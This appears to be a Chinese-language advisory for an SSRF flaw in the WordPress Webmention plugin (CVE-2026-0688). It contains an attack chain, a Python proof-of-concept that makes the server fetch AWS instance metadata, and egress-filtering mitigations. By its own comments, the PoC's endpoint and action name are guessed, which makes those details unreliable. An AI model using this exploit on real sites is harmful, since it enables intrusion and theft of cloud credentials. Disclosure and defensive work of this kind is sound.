CVE-2026-0688 WordPress Webmention插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-0688

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Webmention Plugin

漏洞概述

WordPress Webmention 插件存在服务端请求伪造（SSRF）漏洞，影响 5.6.2 及以下所有版本。漏洞源于 'Tools::read' 函数未对用户输入进行充分过滤。拥有订阅者及以上权限的认证攻击者可利用该漏洞，代表 Web 应用程序向内网或任意位置发起网络请求。这可能导致敏感信息泄露或内部服务被篡改，对服务器安全构成中等风险。

技术细节

该漏洞的核心在于 WordPress Webmention 插件 `includes/class-tools.php` 文件中的 `Tools::read` 方法。该方法在接收处理 Webmention 请求时，未能对用户提供的目标 URL 进行有效的地址验证和过滤。由于权限控制不当，仅需具备“订阅者”级别的低权限账户即可调用该功能。攻击者通过构造恶意的 URL 参数，诱导服务器端向攻击者指定的任意内网或外网地址发起 HTTP 请求。这种 SSRF 攻击方式允许攻击者利用服务器的身份绕过网络边界防御，探测内网拓扑结构，访问本地受限服务（如 localhost、Redis、MySQL 等），甚至在特定情况下读取云平台元数据，从而造成信息泄露或为进一步的渗透攻击提供跳板。

攻击链分析

STEP 1

1. 信息收集与账户获取

攻击者对目标 WordPress 站点进行扫描，确认安装了 Webmention 插件，并注册或获取一个低权限（订阅者）账户。

STEP 2

2. 构造恶意请求

攻击者利用获取的凭证，构造包含恶意目标 URL（如内网 IP 地址）的数据包。

STEP 3

3. 触发漏洞

向服务器发送请求，调用插件中的 'Tools::read' 函数，传入恶意 URL 参数。

STEP 4

4. 服务端请求发起

服务器端解析请求，向攻击者指定的内部或外部地址发起 HTTP 连接。

STEP 5

5. 数据回显或利用

攻击者根据响应时间或错误信息判断内网服务状态，或利用该请求读取敏感信息（如云元数据）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def exploit_ssrf(target_url, attacker_url, wp_cookie):
    """
    Proof of Concept for CVE-2026-0688
    Triggers SSRF in WordPress Webmention Plugin via Tools::read.
    Requires valid Subscriber-level cookies.
    """
    # The vulnerable endpoint is typically part of the plugin's AJAX handling
    # Assuming the endpoint structure based on plugin behavior
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Payload targeting an internal service or external callback
    payload = {
        "action": "webmention_request",  # Hypothetical action name
        "url": attacker_url  # Malicious URL (e.g., http://127.0.0.1:80)
    }
    
    try:
        # Send the request with authentication cookies
        response = requests.post(endpoint, data=payload, headers=headers, cookies=wp_cookie)
        
        if response.status_code == 200:
            print(f"[+] Request sent to {target_url}.")
            print(f"[+] Server likely sent a request to: {attacker_url}")
            print(f"[+] Response Body: {response.text[:100]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Configuration
    TARGET = "http://localhost:8000"  # Replace with actual target
    MALICIOUS_URL = "http://169.254.169.254/latest/meta-data/"  # Example: AWS Metadata
    
    # Cookie string typically looks like "wordpress_logged_in_...=..."
    # You need to acquire this by logging in as a subscriber
    COOKIE = {"wordpress_logged_in_xxx": "your_cookie_value_here"} 
    
    exploit_ssrf(TARGET, MALICIOUS_URL, COOKIE)

影响范围

WordPress Webmention Plugin <= 5.6.2

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用 Webmention 插件以阻断攻击路径。同时，应配置服务器出站流量过滤规则，禁止 Web 服务器访问内网敏感网段（如 127.0.0.1、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）及元数据服务地址（如 169.254.169.254），从而降低 SSRF 漏洞被利用后的风险。